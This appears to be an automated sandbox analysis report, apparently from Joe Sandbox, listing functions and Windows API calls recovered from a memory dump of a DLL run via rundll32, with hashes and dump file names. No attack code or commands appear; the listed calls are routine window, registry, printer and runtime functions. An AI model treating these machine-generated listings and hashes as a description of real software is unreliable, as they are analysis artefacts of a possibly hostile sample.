OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10014A5D
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A7D
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A85
GlobalLock.KERNEL32 ref: 10014A8F
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10014A9C
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10014AB4

Part of subcall function 10020495: GlobalFlags.KERNEL32(?), ref: 100204A0
Part of subcall function 10020495: GlobalUnlock.KERNEL32(?,?,?,10014801,?,00000004,1000116F,?,?,1000113F), ref: 100204B2
Part of subcall function 10020495: GlobalFree.KERNEL32(?), ref: 100204BD

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
Instruction ID: 20fc1444fe35ab48259a21c9388e4acfe4ba196ce7874d1294122afbb026df8a
Opcode Fuzzy Hash: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
Instruction Fuzzy Hash: 5111CAB6500604BBDB22DFA6CD89C6FBBEDEF897407514029FA01C6121DA31E940D728

Uniqueness

Uniqueness Score: -1.00%

Function 10020F2E Relevance: 12.0, APIs: 8, Instructions: 38COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 10020F3B
GetSystemMetrics.USER32 ref: 10020F42
GetSystemMetrics.USER32 ref: 10020F49
GetSystemMetrics.USER32 ref: 10020F53
GetDC.USER32(00000000), ref: 10020F5D
GetDeviceCaps.GDI32(00000000,00000058), ref: 10020F6E
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020F76
ReleaseDC.USER32(00000000,00000000), ref: 10020F7E

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
Instruction ID: 9c0db37145597a9d8002a30536ddf2583a3ab63f37cab70819204e46a6a6359b
Opcode Fuzzy Hash: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
Instruction Fuzzy Hash: 84F09670A40714AEF7206F718D8DF277BA4EBC6B51F01442AE611CB2D0D6B598018F50

Uniqueness

Uniqueness Score: -1.00%

Function 1001820B Relevance: 10.8, APIs: 7, Instructions: 255memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10018224
MapDialogRect.USER32(?,00000000), ref: 100182B5
SysAllocStringLen.OLEAUT32(?,?), ref: 100182D4
CLSIDFromString.OLE32(?,?), ref: 100183C6

Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506

CLSIDFromProgID.OLE32(?,?), ref: 100183CE
SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10018468
SysFreeString.OLEAUT32(00000000), ref: 100184BA

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
String ID:
API String ID: 2841959276-0
Opcode ID: c0153d1bb8fcf0a41aaabcf573d8d81effc90bbca259e310eefe5537c03a2762
Instruction ID: 12b2beb2c71702a94885f2910fef0e7bfaf155135e6476596dcf7fffba126212
Opcode Fuzzy Hash: c0153d1bb8fcf0a41aaabcf573d8d81effc90bbca259e310eefe5537c03a2762
Instruction Fuzzy Hash: E2B1F075900219AFDB44CFA8C984AEE7BF4FF08344F41812AFC199B251E774EA94CB94

Uniqueness

Uniqueness Score: -1.00%

Function 10029D32 Relevance: 10.6, APIs: 7, Instructions: 128COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10029D39
_memset.LIBCMT ref: 10029DA5

Part of subcall function 1002BDD9: _memset.LIBCMT ref: 1002BDE1

VariantClear.OLEAUT32(?), ref: 10029DE5
SysFreeString.OLEAUT32(00000000), ref: 10029E66
SysFreeString.OLEAUT32(00000000), ref: 10029E75
SysFreeString.OLEAUT32(00000000), ref: 10029E84
VariantClear.OLEAUT32(00000000), ref: 10029E99

Part of subcall function 1002981B: __EH_prolog3.LIBCMT ref: 10029837
Part of subcall function 1002981B: VariantClear.OLEAUT32(?), ref: 1002989C

Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
String ID:
API String ID: 2905758408-0
Opcode ID: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
Instruction ID: f0b41ad0b9e8c5ab018840f5e4220df87c974ebe41012567005bb994ff67d79c
Opcode Fuzzy Hash: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
Instruction Fuzzy Hash: 285145B1900209DFDB50CFA4D984BDEBBF8FF08345F604529E516EB292DB74A944CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10026AC9 Relevance: 10.6, APIs: 7, Instructions: 121COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10026AD0
VariantClear.OLEAUT32(?), ref: 10026B66
_memset.LIBCMT ref: 10026B9F
_memset.LIBCMT ref: 10026BAB
SysFreeString.OLEAUT32(?), ref: 10026BF0
SysFreeString.OLEAUT32(?), ref: 10026BFA
SysFreeString.OLEAUT32(?), ref: 10026C04

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: FreeString$_memset$ClearH_prolog3Variant
String ID:
API String ID: 3574576181-0
Opcode ID: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
Instruction ID: f024da645e7c2c1b7af1d173f97c0c2408efe7f25a4d8a65d4f7a6d8da03a969
Opcode Fuzzy Hash: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
Instruction Fuzzy Hash: D5414B71901229EFCB12DFA4CC45ADDBBB9FF48750F60811AF059AB151C770AA91CF90

Uniqueness

Uniqueness Score: -1.00%

Function 10016570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117registryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 1001658F
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1001664B
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10016662
RegCloseKey.ADVAPI32(?), ref: 1001667C
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1001668E

Strings

Software\, xrefs: 100165E4

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseEnumH_prolog3OpenQueryValue
String ID: Software\
API String ID: 3878845136-964853688
Opcode ID: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
Instruction ID: 033a50cfb30fa6cc3e6a93964c888ed0270874f81604230ed873c3433942879c
Opcode Fuzzy Hash: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
Instruction Fuzzy Hash: EB41BD3590021ADBDF11DBA4CC85AEFB7F9EF49300F10452AF551E7290DB74AA84CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001AC0A Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 1001AC38
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AC5F
UpdateWindow.USER32 ref: 1001AC79
SendMessageA.USER32 ref: 1001AC9D
SendMessageA.USER32 ref: 1001ACB7
UpdateWindow.USER32 ref: 1001ACFD
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AD31

Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
Instruction ID: 2c496a546f4f3369c4007c2120619f6f6246382fa3c8875764faf214921a126d
Opcode Fuzzy Hash: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
Instruction Fuzzy Hash: CF419C306047419FD721DF218D84A1BBAE4FFC6B95F00092DF8829A5A1E772D9C4CA92

Uniqueness

Uniqueness Score: -1.00%

Function 100151F8 Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 10020D74
SendMessageA.USER32 ref: 10020D8D
GetFocus.USER32 ref: 10020D9F
SendMessageA.USER32 ref: 10020DAB
GetLastActivePopup.USER32(?), ref: 10020DD2
SendMessageA.USER32 ref: 10020DDD
SendMessageA.USER32 ref: 10020E01

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: MessageSend$ActiveCaptureFocusLastPopup
String ID:
API String ID: 3219385341-0
Opcode ID: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
Instruction ID: 62284d7f9b5d477bd881e5ff36e2f7527576b9e0115aa241cae08abffcb520cf
Opcode Fuzzy Hash: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
Instruction Fuzzy Hash: B2314975301315EFDA11DB64ECC4D6F7AEEEB866C1B530469F840DB112DB31EC8196A2

Uniqueness

Uniqueness Score: -1.00%

Function 1002A200 Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000002), ref: 1002A21B
GetParent.USER32(?), ref: 1002A22C
GetWindow.USER32(?,00000002), ref: 1002A24F
GetWindow.USER32(?,00000002), ref: 1002A261
GetWindowLongA.USER32(?,000000EC), ref: 1002A270
IsWindowVisible.USER32(?), ref: 1002A28A
GetTopWindow.USER32(?), ref: 1002A2B0

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window$LongParentVisible
String ID:
API String ID: 506644340-0
Opcode ID: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
Instruction ID: 0686fc7eee0d828e519c8ddef4b664d273c3d3866c12363d81ce6f3f8585b441
Opcode Fuzzy Hash: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
Instruction Fuzzy Hash: 8D219532A00B25EBD621EBB99C49F1B76DCFF8A790F810514F991EB152DF26EC848750

Uniqueness

Uniqueness Score: -1.00%

Function 10032A89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 10032AB8
__calloc_crt.LIBCMT ref: 10032AC4
CreateThread.KERNEL32(00000002,?,V&',00000000,?,1001623D), ref: 10032B08
GetLastError.KERNEL32(?,1001623D,?,?,100160A8,?,00000002,00000030,?,00000000), ref: 10032B12
__dosmaperr.LIBCMT ref: 10032B2A

Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4

Part of subcall function 10037753: __decode_pointer.LIBCMT ref: 1003775C

Strings

V&', xrefs: 10032AFD

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
String ID: V&'
API String ID: 1067611704-802299783
Opcode ID: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
Instruction ID: 55a26fe1f49629ebb029cc0f5307a0876855c5a2f29d8e6ee061ec31c14b4724
Opcode Fuzzy Hash: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
Instruction Fuzzy Hash: 28112376505205EFDB02EFA4DC8288FBBE8FF08366F210429F501DA061EB31A910CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10001390 Relevance: 10.6, APIs: 7, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 10016C9F: _memset.LIBCMT ref: 10016CB6

Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013DA
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013EC
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013FE
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001410
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001422
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001446
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001458

Part of subcall function 100136C0: LoadIconA.USER32 ref: 100136D2

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ProcessorVirtual$Concurrency::RootRoot::$IconLoad_memset
String ID:
API String ID: 2004563703-0
Opcode ID: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
Instruction ID: cb42d3b07606be4c321c66a21cc03232491b7df8b22d3b1298026f5f2f4788d5
Opcode Fuzzy Hash: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
Instruction Fuzzy Hash: 1A216DB4904299EBDB04CBA8C951BAEBB75FF05704F148558E4516B3C2CB79AA00CB65

Uniqueness

Uniqueness Score: -1.00%

Function 10017632 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10017660
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10017683
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001769F
RegCloseKey.ADVAPI32(?), ref: 100176AF
RegCloseKey.ADVAPI32(?), ref: 100176B9

Strings

software, xrefs: 10017648

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
Instruction ID: 0cbbb75e8a23424455f11a5bf93a60ebfd6ed3f7897ef2d174d7de764d8d358b
Opcode Fuzzy Hash: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
Instruction Fuzzy Hash: E911C576900169FBDB21DB9ACD88CDFBFBCEF8A740B1040AAE504E2121D3719A55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10001180 Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

~_Task_impl.LIBCPMT ref: 100011B6

Part of subcall function 10018A6F: __EH_prolog3.LIBCMT ref: 10018A76

~_Task_impl.LIBCPMT ref: 100011C8
~_Task_impl.LIBCPMT ref: 100011EC

Part of subcall function 10018AC4: __EH_prolog3.LIBCMT ref: 10018ACB

~_Task_impl.LIBCPMT ref: 100011FE
~_Task_impl.LIBCPMT ref: 10001210
~_Task_impl.LIBCPMT ref: 10001222
~_Task_impl.LIBCPMT ref: 10001231

Part of subcall function 10018662: __EH_prolog3.LIBCMT ref: 10018669

Part of subcall function 10016C14: __EH_prolog3.LIBCMT ref: 10016C1B

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Task_impl$H_prolog3
String ID:
API String ID: 1204490572-0
Opcode ID: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
Instruction ID: 6e4cb6b4a122521f521244997ac3fe4936e5f385243ec76687bf906466ac38b5
Opcode Fuzzy Hash: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
Instruction Fuzzy Hash: 6B215970905189DBEF09DB98C860BBEBB75EF01308F18469DE0526B3C2CB392B00C716

Uniqueness

Uniqueness Score: -1.00%

Function 10020A8E Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?), ref: 10020A95
__CxxThrowException@8.LIBCMT ref: 10020A9F

Part of subcall function 10033135: RaiseException.KERNEL32(?,?,?,?), ref: 10033175

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004), ref: 10020AB6
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3

Part of subcall function 100201BD: __CxxThrowException@8.LIBCMT ref: 100201D1

_memset.LIBCMT ref: 10020AE2
TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
Instruction ID: 3e12b38782b34356c97e10a87625d487b7a933956f885299f771b8ffc362d3ba
Opcode Fuzzy Hash: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
Instruction Fuzzy Hash: 7B117974100305AFE721EF60CD86D2ABBA6EF44314B51C029F8569A622DB30FC60CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10020EEA Relevance: 10.5, APIs: 7, Instructions: 29COMMON

Download Yara Rule

APIs

GetSysColor.USER32 ref: 10020EF6
GetSysColor.USER32 ref: 10020EFD
GetSysColor.USER32 ref: 10020F04
GetSysColor.USER32 ref: 10020F0B
GetSysColor.USER32 ref: 10020F12
GetSysColorBrush.USER32 ref: 10020F1F
GetSysColorBrush.USER32 ref: 10020F26

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
Instruction ID: b96cbce945517a62156269669ca61c0ebe7744eb3e98ebe12a1aee9bfd1db884
Opcode Fuzzy Hash: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
Instruction Fuzzy Hash: 65F012719407449BD730BF728D49B47BAD5FFC4710F02092EE2418B990E6B6E040DF44

Uniqueness

Uniqueness Score: -1.00%

Function 1002981B Relevance: 9.4, APIs: 6, Instructions: 404COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10029837
VariantClear.OLEAUT32(?), ref: 1002989C

Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205

VariantClear.OLEAUT32(?), ref: 10029AAB
VariantClear.OLEAUT32(?), ref: 10029B1D
VariantClear.OLEAUT32(?), ref: 10029D0E

Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7

Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875

